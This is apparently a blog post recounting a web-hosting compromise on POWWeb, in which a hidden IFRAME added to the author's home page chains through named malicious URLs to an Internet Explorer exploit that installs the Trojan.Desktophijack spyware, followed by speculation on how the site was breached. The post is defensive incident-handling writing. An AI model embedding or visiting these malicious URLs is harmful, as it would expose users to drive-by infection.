Website Hijinks

The fun continues over at POWWeb. A bunch of us have noticed that the home page has been appended (at the bottom) with an IFRAME calling http://www.tgp.la/or.html. The file change occurred at 20050503 21:34 (-0700).
The tgp.la page is loaded as a webbug (0by 0 in size) on my homepage. When examine what www.tgp.la/or.html does, I see that it loads via another iframe http://www.realizeit.biz/v058/wow.html. That html page uses an old Internet Explorer exploit to install some spyware known as Trojan.Desktophijack. Some antivirus already catches it. Symantec wasn’t catching it so I submitted the file to Symantec. They responded that it is a virus and they will be adding it to the definitions. Hopefully it make it into the liveupdate due out today.
The question with incident handling is how did it happen. With the 404 redirect problem at powweb that I reported before, it was fairly easy to prove that this was a powweb problem (although they never admitted it). In this case it is much more difficult to prove. The POWWeb fanboys are pointing a finger at the applications we are using (phpnuke, movable type, gallery, phpbb, awstats, etc). Then there is also the potential for the FTP password being guessed.
There is not one vulnerable package that we all run. I suppose it could be a hybrid worm looking for several vulnerabilities. But I think I would see something like that in my http logs. I’ve reviewed the logs and see nothing of the sort. That leaves me wondering if my web provider powweb hasn’t screwed up again like they did with the 404 error page problem. Until we figure out what is wrong there is no way to guarantee that an attacker will not be able to update my page again!